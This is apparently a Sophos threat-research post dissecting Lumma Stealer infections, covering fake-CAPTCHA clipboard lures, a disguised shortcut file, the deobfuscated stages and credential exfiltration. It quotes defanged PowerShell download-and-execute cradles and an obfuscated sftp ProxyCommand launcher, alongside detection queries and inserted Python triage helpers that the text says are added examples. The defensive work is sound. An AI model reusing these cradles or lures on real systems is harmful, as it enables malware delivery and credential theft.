In September 2024, a threat hunt across Sophos Managed Detection and Response’s telemetry uncovered a Lumma Stealer campaign using fake CAPTCHA sites that instructed victims to paste a (malicious) PowerShell-encoded command into Windows’ command-line interface. Subsequent investigations allowed us to dig deeply into the mechanics of the infamous infostealer. This post recounts those findings, as seen in various MDR investigations through the fall and winter of 2024-25.
Lumma Stealer basics
Lumma Stealer has been active since mid-2022 and is believed to have originated with a Russian-language developer. Sold as Malware-as-a-Service (MaaS), its maintainer sells access to the stealer via Telegram and provides updates and user support. Additional information is made available on a dedicated Gitbook site.
The infostealer targets a variety of valuables including passwords, session tokens, cryptocurrency wallets, and personal information from compromised devices. The threat is amplified by its cunning delivery methods. In one instance, the attacker manipulated users’ trust in CAPTCHA challenges and employed social-engineering tactics to deceive victims seeking software downloads. In another, more straightforward case, the user was directed to a malicious website and prompted to open a file in Windows Explorer.
The variations we observed in Lumma Stealer behavior are important to defenders, because Lumma Stealer infection has been extremely widespread in recent months. That said, the delivery methods we observed could easily be adapted to malware other than Lumma Stealer, which makes documenting them useful. (A list of IoCs will be made available on our GitHub repository.)
Our researchers are aware of similar work underway from Netskope Threat Labs, including an estimate that as many as 5,000 fake-CAPTCHA sites may currently be involved in a Lumma Stealer-related campaign. Likewise, researchers at Qualys have done solid research detailing the mechanisms Lumma Stealer has used in recent months. Sophos strongly recommends scrutiny of the IoCs these researchers have provided to the public, in addition to our own.
Investigation #1: The art(istsponsorship) of the steal
In this investigation, the observed attack flow with CAPTCHA involvement was relatively simple: The attacker creates a malicious website, “protected” by a normal-looking CAPTCHA verification at hxxps[://]camplytic[.]com/go/cdff9f96-8cbd-4c44-b679-2f612a64cd00. The visiting user clicks on the familiar I-am-not-a-robot box, as shown in Figure 1.
Figure 1: A familiar-seeming verification box
The user was next redirected to another alleged verification page, hxxps[://]sos-at-vie-1[.]exo[.]io/store-as/cloudflare-new-artist[.]html, on which they were asked to first open the Windows “Run” dialog, then press Ctrl-V followed by Enter, as shown in Figure 2.
Figure 2: The next “security check” request is somewhat unusual, but fairly easy for unwary users
Behind the scenes, a concealed JavaScript function on the page drops a PowerShell command onto the clipboard; once the user pastes it into the Run dialog box and presses Enter, it runs in a hidden window:
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -command $uR='hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/new-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
That script retrieves the infostealer malware from a command-and-control (C2) server, and it’s off to the payload-retrieval races, as shown in Figure 3.
Figure 3: Attack flow with CAPTCHA abuse; note that Lumma Stealer itself is loaded midway through the process
When run, the PowerShell script retrieves the Lumma Stealer malware from an external server, initiating the download of the first stage of the malicious payload onto the compromised system. The command
$uR='hxxps[://]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/new-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
retrieves the content of the new-artist.txt file hosted on the external server. That content is then processed and executed via the Invoke-Expression cmdlet.
The new-artist.txt file in the code above contains another PowerShell script, which connects to hxxps[://]fixedzip[.]oss-ap-southeast-5[.]aliyuncs[.]com/artist[.]zip. This zipped copy of Lumma Stealer is downloaded to the target machine, extracted into the user’s %AppData% path, and saved as ‘ArtistSponsorship.exe’ (sha256:e298cd6c5fe7b9b05a28480fd215ddcbd7aaa48a) for further execution, as shown in Figure 4.
Figure 4: The toxic download
The ArtistSponsorship.exe file contains, among several dropped files as seen in Figure 5, the obfuscated AutoIt.exe script (sha256:05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7). These are dropped into the %temp% directory.
Figure 5: Multiple files dropped into %temp% by ArtistSponsorship.exe
The AutoIT script does many things and includes shellcode. Among its actions, it connects to the C2 domain snail-r1ced[.]cyou – IP 104.21.84[.]251 (CLOUDFLARENET). Lumma Stealer then targets user data, login credentials from various browsers, bitcoin wallets, and cookies. In Figure 6, AutoIt3.exe is accessing login data and cookies used by the Chrome browser.
Figure 6: Catching AutoIT3.exe red-handed with Chrome login credentials (among other things)
AutoIt3.exe then executes the script X.a3x to exfiltrate the captured Chrome login data and cookies to the C2 IP 104.21.84[.]251 (CLOUDFLARENET). In the case we observed, a file of just 6.37MB – the login data and cookies – was successfully exfiltrated, after which the AutoIt3.exe process terminated.
Investigation #2: A deep dive into the code
In this section, we’ll dig even more deeply into the specifics of the files and processes we encountered within the payload delivery chain. In the case we’ll examine, the user inadvertently visited an infected website.
First, the user was prompted to open a PDF-format file in Windows Explorer, as shown in Figure 7.
Figure 7: The user is trying to load a PDF, but that’s not what’s about to happen
The file, apparently a PDF called “Instruction_695-18014-012_Rev.PDF,” is actually a remotely hosted .lnk (shortcut) file, as shown in Figure 8.
Figure 8: Windows warns that this is actually a shortcut, not a PDF
The shortcut file attempts to execute an obfuscated PowerShell script, as shown in Figure 9.
Figure 9: The obfuscated script in the Target field
The full text of the obfuscated script is
C:\Windows\System32\OpenSSH\sftp.exe -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/W7]]]7Z9]]]].mp4]]' -replace ']')"
When a user executes the shortcut file, sftp.exe will execute the obfuscated command via the ProxyCommand flag. However, sftp.exe doesn’t actually establish the network connection itself; it delegates that task to ssh.exe with a specific set of parameters:
"C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/W7]]]7Z9]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp .
As we see in the block of code above, the parameters abuse the ‘ProxyCommand’ option. ProxyCommand specifies a command to run instead of connecting directly to the target host. In the above example, ProxyCommand is set to run PowerShell, which in turn executes mshta.exe to download and execute a remote script.
The first PowerShell script execution is as shown in Figure 10.
Figure 10: The first execution is revealed
This script processes AES-encrypted data inside the aepcc function, as shown in Figure 11.
Figure 11: Lumma Stealer’s creators didn’t choose a weak encryption algorithm
In Figure 12, the AES key is listed first. It’s followed by an initialization vector (IV) of 16 bytes of zeroes; the IV is meant to add randomness to the start of the encryption process, though an all-zero IV adds none. With the key and IV in hand, we decrypted the data using CyberChef, as shown.
Figure 12: CyberChef begins to reveal what’s going on
Next, we decoded the script from base64 – closer to readable, but now a large mass of decimals, as shown in Figure 13.
Figure 13: The script comes into better focus
The decimals in that mass of numbers are in fact ASCII characters. A further pass through CyberChef, as shown in Figure 14, reveals that this is a PE file, one designed to download further payloads.
Figure 14: A PE file with a single malicious purpose
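Recovering the command PowerShell would actually run from a shortcut like this one is mechanical once the `-replace ']'` idiom is recognised. The Python helper below is an added example, not code from the article or from Sophos: it pulls the quoted literal and the padding string out of a captured command line, strips the padding the way `-replace` would, defangs any URL in the result so it can be pasted into a case note, and flags the sftp/ssh ProxyCommand launcher pattern. The sample command line is constructed from the shortcut text quoted above; the function names are the example’s own.

```python
import re

# Sample command line, constructed from the shortcut Target text quoted above;
# the closing double quote of the ProxyCommand value is taken from the ssh.exe line.
SAMPLE_CMDLINE = (
    'C:\\Windows\\System32\\OpenSSH\\sftp.exe -o ProxyCommand="powershell powershell '
    "-Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/"
    "]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/W7]]]7Z9]]]].mp4]]' "
    "-replace ']')\""
)

# ('<padded literal>' -replace '<pad>'): capture the literal and the pad string.
PADDED_RE = re.compile(r"\(\s*'([^']*)'\s+-replace\s+'([^']+)'\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"]+")

def unwrap_replace_padding(cmdline):
    """Return the string PowerShell's -replace would produce, or None if the idiom
    is absent. The pad is removed literally, which is what happens for ']' (a lone
    ']' is a literal in .NET regex); a metacharacter pad would need re.sub()."""
    m = PADDED_RE.search(cmdline)
    if not m:
        return None
    padded, pad = m.group(1), m.group(2)
    return padded.replace(pad, "")

def defang(text):
    """Neutralise URLs in analyst output (http -> hxxp, '.' -> '[.]')."""
    return URL_RE.sub(lambda u: u.group(0).replace("http", "hxxp").replace(".", "[.]"), text)

def is_proxycommand_lolbin(cmdline):
    """sftp.exe/ssh.exe started with a ProxyCommand that launches PowerShell: the
    transfer client is being used purely as a launcher, as in the shortcut above."""
    low = cmdline.lower()
    return ("sftp.exe" in low or "ssh.exe" in low) and "proxycommand=" in low and "powershell" in low

def triage(cmdline):
    """Verdict plus the defanged decoded command, ready for a case note."""
    decoded = unwrap_replace_padding(cmdline)
    return {
        "proxycommand_lolbin": is_proxycommand_lolbin(cmdline),
        "decoded": defang(decoded) if decoded else None,
    }

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```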
This script performs the following actions:
- Sets variable ‘O’ equal to the C2 URL.
- Dynamically retrieves the ‘Load’ method from the .NET ‘System.Reflection.Assembly’ class. The ‘Load’ method is then invoked on the value of variable ‘oQ7’ (the obfuscated PE); this essentially loads the PE into memory.
- As displayed above, the PE contains a single static method named ‘aHdiNKuWlR’. This method downloads the content of the URL passed to it using WebClient. The script passes the value of the ‘O’ variable (containing the C2 URL) to the PE loaded in memory.
- The ‘aHdiNKuWlR’ method defined in the PE processes the URL passed to it by downloading its content using DownloadString.
- The ‘appdata\roaming’ path is saved to the variable ‘Ikmg’.
- Function ‘bOje’ is executed and performs the following actions:
  - The function first appends ‘i1040gi.pdf’ to the ‘Ikmg’ (file path) variable.
  - Makes a call to function ‘rlYDr’ and passes a unique identifier which is retrieved from the AES-decrypted data at position 103 with length 86, as shown in Figure 15.
  - Checks whether the ‘appdata\roaming\i1040gi.pdf’ path exists.
  - If the file path doesn’t exist, executes function ‘XSFbo’. This function takes two parameters:
    - ‘BtPdn’: This function takes the unique identifier as an input. It extracts a specific 100 characters from the AES-decrypted data and uses them as a lookup table to convert the unique identifier into a URL. The resulting URL is a legitimate PDF document from the IRS.
    - The second parameter is the file path in variable ‘EVcD’, as shown in Figure 16.
Figure 16: The file path appears
After decoding the URL, function ‘XSFbo’ takes the URL and downloads the contents using ‘Net.WebClient’ (which was also decoded using ‘BtPdn’), then saves the PDF to the file path specified in variable ‘EVcD’, as shown in Figure 17.
Figure 17: The file path appears again, as the save destination
Finally, the PDF that was downloaded is executed, as shown in Figures 18 and 19.
Figure 18: There it is…
Figure 19: …and there it goes
But wait! There’s more!
To conclude this analysis, let’s trace back to the stages before the benign PDF is downloaded and executed.
We first noticed that there was a dynamic retrieval of the ‘Load’ method, which was used to load the embedded PE that we decoded. Then we saw a static method defined inside the PE that was being leveraged to download the next stage. Lastly, we see the downloaded script executed with ‘InvokeScript’. Let’s focus on this next stage.
The next stage that was downloaded is heavily obfuscated with useless comments and very long variable names, as shown in Figure 20.
Figure 20: Mooncake, pasties, fritter, ragu, kebabs, taco… clearly someone was obfuscating on an empty stomach
Once de-obfuscated, we discovered that this script is responsible for downloading a final stage. The script features dynamic resolution of low-level Windows APIs such as ‘GetProcAddress’, ‘VirtualProtect’, and ‘AmsiInitialize’.
Detections
The following queries may prove useful for defenders looking for evidence of Lumma Stealer on their systems.
Identify all threat files (scripts/binaries) from known SPIDs used to build Lumma Stealer within the last eight hours, or within a specific time range (see the commented-out condition):
SELECT strftime('%Y-%m-%d %H:%M:%S', datetime(sfj.time,'unixepoch')) dateTime,
       sfj.time AS epoch_time,
       spj.cmd_line,
       CASE sfj.event_type WHEN 0 THEN 'Created' WHEN 2 THEN 'Deleted' END eventType,
       sfj.sophos_pid,
       sfj.path AS file_path,
       sfj.target_path,
       sfj.file_size,
       strftime('%Y-%m-%d %H:%M:%S', datetime(sfj.creation_time,'unixepoch')) birth_time_utc,
       strftime('%Y-%m-%d %H:%M:%S', datetime(sfj.last_write_time,'unixepoch')) modified_time_utc,
       spj.sid,
       u.username,
       sfj.sha256
FROM sophos_file_journal sfj
LEFT JOIN sophos_process_journal spj ON sfj.sophos_pid = spj.sophos_pid
LEFT JOIN users u ON spj.sid = u.uuid
WHERE sfj.sophos_pid IN ('', ' ', ' ', ' ')
  AND sfj.event_type IN (0, 2)
  AND sfj.time > strftime('%s', 'now', '-8 hour')
  -- AND sfj.time > strftime('%s','2024-11-13 04:44:32') AND sfj.time < strftime('%s','2024-11-13 04:47:35')
Identify possible exfiltration and C2:
SELECT strftime('%Y-%m-%d %H:%M:%S', datetime(time,'unixepoch')) dateTime, *
FROM sophos_process_activity
WHERE sophos_pid IN ('', ' ', ' ', ' ')
  AND subject IN ('Dns', 'FileOtherReads', 'Ip', 'RuntimeIOCs', 'Process', 'Network')
  AND time > strftime('%s', 'now', '-8 hour')
  -- AND time > strftime('%s','2024-11-13 04:44:32') AND time < strftime('%s','2024-11-13 04:47:35')
Identify the source URL of the fake CAPTCHA / verification prompt from the browsing history (the history databases of each browser, which can then be examined offline):
SELECT f.path, f.directory, f.filename, f.size,
       strftime('%Y-%m-%d %H:%M:%S', datetime(f.mtime,'unixepoch')) AS modified_time_utc,
       strftime('%Y-%m-%d %H:%M:%S', datetime(f.atime,'unixepoch')) AS last_access_time_utc,
       strftime('%Y-%m-%d %H:%M:%S', datetime(f.ctime,'unixepoch')) AS change_time_utc,
       strftime('%Y-%m-%d %H:%M:%S', datetime(f.btime,'unixepoch')) AS birth_time_utc,
       attributes,
       h.sha256 AS SHA256, h.sha1 AS SHA1, h.md5 AS MD5
FROM file f
LEFT JOIN hash h ON f.path = h.path
WHERE f.path LIKE 'C:\Users\%\AppData\Local\Google\Chrome\User Data\%\History'           -- Windows history for Chrome
   OR f.path LIKE 'C:\Users\%\AppData\Local\Microsoft\Edge\User Data\%\History'          -- history for Edge
   OR f.path LIKE 'C:\Users\%\AppData\Roaming\Mozilla\Firefox\Profiles\%\places.sqlite'    -- Windows history for Firefox
   OR f.path LIKE 'C:\Users\%\AppData\Roaming\Mozilla\Firefox\Profiles\%\downloads.sqlite' -- Windows download history for Firefox
ORDER BY f.mtime DESC
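The Live Discover queries above depend on Sophos tables. As an added example that runs anywhere (not Sophos code, and not the product’s detection logic), the Python below scores generic process-creation records for the cradle seen in Investigation #1: PowerShell launched from explorer.exe (the Run dialog) with a hidden window, a web-download cmdlet and Invoke-Expression. The record shape, the weights and the sample events are constructed for this example; the first sample mirrors the command quoted in Investigation #1 with its URL kept defanged.

```python
import re

# Indicators of the paste-into-Run cradle from Investigation #1: (name, regex, weight).
# Weights are illustrative values chosen for this example, not a vendor's scoring.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 2),
    ("web_download", re.compile(r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring)\b", re.I), 2),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 1),
]
POWERSHELL_RE = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.I)

def score_event(event):
    """Score one process-creation record: (score, matched indicator names).
    Records are dicts with 'image', 'parent_image' and 'cmd_line' keys, a shape
    constructed for this example rather than any vendor's schema."""
    if not POWERSHELL_RE.search(event["image"]):
        return 0, []
    hits = [name for name, rx, _ in INDICATORS if rx.search(event["cmd_line"])]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # The Run dialog is hosted by explorer.exe, so that parent distinguishes a
    # user pasting the clipboard command from a script, installer or scheduler.
    if event["parent_image"].lower().endswith("explorer.exe"):
        hits.append("parent_explorer")
        score += 3
    return score, hits

def suspicious_events(events, threshold=6):
    """Records at or above the threshold, highest score first."""
    rows = [(*score_event(e), e) for e in events]
    return sorted((r for r in rows if r[0] >= threshold), key=lambda r: -r[0])

# Constructed sample records. The first mirrors the Investigation #1 command
# (URL kept defanged); the others are benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    {"image": r"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmd_line": "PowerShell.exe -W Hidden -command $uR='hxxps[://]fixedzip[.]oss-ap-southeast-5[.]"
                 "aliyuncs[.]com/new-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; "
                 "$t=$reS.Content; iex $t"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmd_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmd_line": "cmd.exe /c echo iex"},
]
```

Feed `suspicious_events` the process-creation records from your own telemetry in the same dict shape; the explorer.exe parent check is the part most specific to the Run-dialog lure.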
Conclusion
Lumma Stealer remains a significant threat as of this writing. The documented tactic of using fake CAPTCHA sites to lull victims into entering a malicious command on their own systems is an ugly twist on the situation; Sophos’ endpoint protection counters the threat with a range of malware detections and behavioral-analysis tactics, but educating users to distrust CAPTCHAs, after so many years of convincing them to answer them, is a heavy lift. As those education efforts develop, defenders are advised to institute appropriate endpoint-detection technology and to be aware that the tactics of this all-too-common infostealer continue to evolve.
Acknowledgements
Andrew Jaeger, Nayana V R, David Whitehall, and Waldemar Stiefvater contributed analysis and constructive critique to this work.
Indicators of compromise
The IoCs compiled in this investigation are available on our GitHub repository.